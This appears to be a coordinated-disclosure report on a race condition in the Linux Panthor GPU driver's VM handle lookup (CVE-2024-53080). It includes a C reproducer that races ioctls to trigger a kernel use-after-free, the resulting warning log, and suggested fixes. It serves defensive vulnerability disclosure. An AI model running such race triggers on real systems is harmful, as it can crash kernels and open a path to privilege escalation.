Introduction / Context

As far as I know, while the Panthor driver is for widely-used hardware (the newer Arm Mali GPU models), the Panthor driver is not widely used yet. Smartphones and such currently still use the older non-upstream driver for the same hardware; the only devices I'm aware of that already use the Panthor driver are some single-board computers.

So to the security@kernel and psirt@arm folks: I am reporting this as a security bug (to security@kernel because it's in upstream code, and to psirt@arm because it's in Arm's driver); but I don't think there is much urgency with bugs that are found this early. You can probably stop reading here unless you're one of the Panthor maintainers.

Issue description

panthor_vm_pool_get_vm() is racy: Without holding any relevant locks, it first calls xa_load(&pool->xa, handle) to turn a VM handle into a panthor_vm*, then calls panthor_vm_get() to increment the refcount of the panthor_vm. A concurrent DRM_IOCTL_PANTHOR_VM_DESTROY can destroy the panthor_vm in between.

Reproducer

I am testing on a "Rock 5B" single-board computer running the vendor kernel 6.1.43-19-rk2312 #428a0a5e6 because I haven't set up a kernel build environment for this device yet. But I have looked at the latest code in drm-misc and the issue still seems to exist there, too.

My reproducer follows - it just keeps racing DRM_IOCTL_PANTHOR_VM_GET_STATE ioctls with DRM_IOCTL_PANTHOR_VM_DESTROY ioctls:

// compile with -pthread
// headers required by the calls below
#include <pthread.h>
#include <err.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include "drm/panthor_drm.h"

// bail out with a message if a syscall-style call returns -1
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define GPU_PATH "/dev/dri/by-path/platform-fb000000.gpu-card"

static int panthor_fd = -1;

// racing thread: keeps looking up VM handle 1
static void *thread_fn(void *dummy) {
  while (1) {
    struct drm_panthor_vm_get_state getstate_args = { .vm_id = 1 };
    ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_GET_STATE, &getstate_args);
  }
}

int main(void) {
  panthor_fd = SYSCHK(open(GPU_PATH, O_RDWR));

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  // main thread: keeps creating and destroying the VM with handle 1
  while (1) {
    struct drm_panthor_vm_create create_args = {
      .flags = 0,
      .user_va_range = 0 /*kernel picks*/
    };
    SYSCHK(ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_CREATE, &create_args));
    assert(create_args.id == 1);

    struct drm_panthor_vm_destroy destroy_args = { .id = 1 };
    SYSCHK(ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_DESTROY, &destroy_args));
  }
}

If you compile that and run it for a few seconds, you should get a warning about an attempt to increment a refcount that was zero:

------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 6 PID: 2210 at lib/refcount.c:25 refcount_warn_saturate+0xa4/0x124
Modules linked in: [...]
CPU: 6 PID: 2210 Comm: destroy-vs-get- Tainted: G O 6.1.43-19-rk2312 #428a0a5e6
Hardware name: Radxa ROCK 5B (DT)
pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : refcount_warn_saturate+0xa4/0x124
lr : refcount_warn_saturate+0xa4/0x124
sp : ffff800010f8bbc0
x29: ffff800010f8bbc0 x28: ffff800010f8bd08 x27: 0000000000000008
x26: 0000ffffab60e938 x25: 0000000000000008 x24: ffff000028cc9800
x23: ffff000028cc9800 x22: ffff800010f8bd08 x21: ffff80000104d5b4
x20: ffff800010f8bd08 x19: ffff0001f2e71000 x18: 0000000000000000
x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
x14: 0000000000000000 x13: 2e656572662d7265 x12: 7466612d65737520
x11: 3b30206e6f206e6f x10: 697469646461203a x9 : ffff8000080dbc88
x8 : 206e6f206e6f6974 x7 : 69646461203a745f x6 : 746e756f63666572
x5 : ffff0001fb5c8a90 x4 : 000000000000000d x3 : 0000000000000000
x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0001f6d89f00
Call trace:
 refcount_warn_saturate+0xa4/0x124
 refcount_inc+0x24/0x58 [panthor]
 panthor_vm_get+0x24/0x34 [panthor]
 panthor_vm_pool_get_vm+0x1c/0x24 [panthor]
 panthor_ioctl_vm_get_state+0x28/0x5c [panthor]
 drm_ioctl_kernel+0xa8/0xf8
 drm_ioctl+0x2e0/0x324
 vfs_ioctl+0x2c/0x48
 __arm64_sys_ioctl+0x7c/0xac
 invoke_syscall+0x80/0x114
 el0_svc_common.constprop.0+0xd0/0x120
 do_el0_svc+0x98/0xbc
 el0_svc+0x24/0x48
 el0t_64_sync_handler+0x90/0xf8
 el0t_64_sync+0x174/0x178
[...]

Fixing it

I guess one way you could fix it would be to add locking around the lookup in panthor_vm_pool_get_vm(); but if you want to avoid locking there, you could probably instead RCU-delay the freeing of struct panthor_vm in panthor_vm_free(), and then in panthor_vm_pool_get_vm(), use rcu_read_lock() and kref_get_unless_zero() to locklessly try to grab a reference to the panthor_vm (which will succeed unless you raced with VM destruction).

Disclosure deadline

This bug is subject to a 90-day disclosure deadline.
If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-03.

For more details, see the Project Zero vulnerability disclosure policy:
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

Related CVE Number: CVE-2024-53080

Credit: Jann Horn
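
Illustration of the "get unless zero" step

As a rough illustration of the lockless approach suggested under "Fixing it", here is a minimal user-space sketch of the "get unless zero" step using C11 atomics. The names struct obj, obj_get_unless_zero() and obj_put() are made up for this example and are not Panthor or kernel APIs. In the kernel, kref_get_unless_zero() would play this role, and it would only be safe together with rcu_read_lock() and an RCU-delayed free, so that the memory holding the counter is still valid when it is read. The sketch does not model that part.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical user-space stand-in for a refcounted object. */
struct obj {
	atomic_uint refcount;
};

/*
 * Take a reference only if the count is still nonzero.
 * Returns false if the object is already on its way to being freed.
 */
static bool obj_get_unless_zero(struct obj *o)
{
	unsigned int old = atomic_load(&o->refcount);

	while (old != 0) {
		/* On failure, 'old' is updated to the current value. */
		if (atomic_compare_exchange_weak(&o->refcount, &old, old + 1))
			return true;
	}
	return false;
}

/* Drop a reference; returns true if this was the last one. */
static bool obj_put(struct obj *o)
{
	return atomic_fetch_sub(&o->refcount, 1) == 1;
}
```

A lookup path built on this would treat a false return like a failed lookup (the handle no longer refers to a live object) instead of incrementing a refcount that has already dropped to zero.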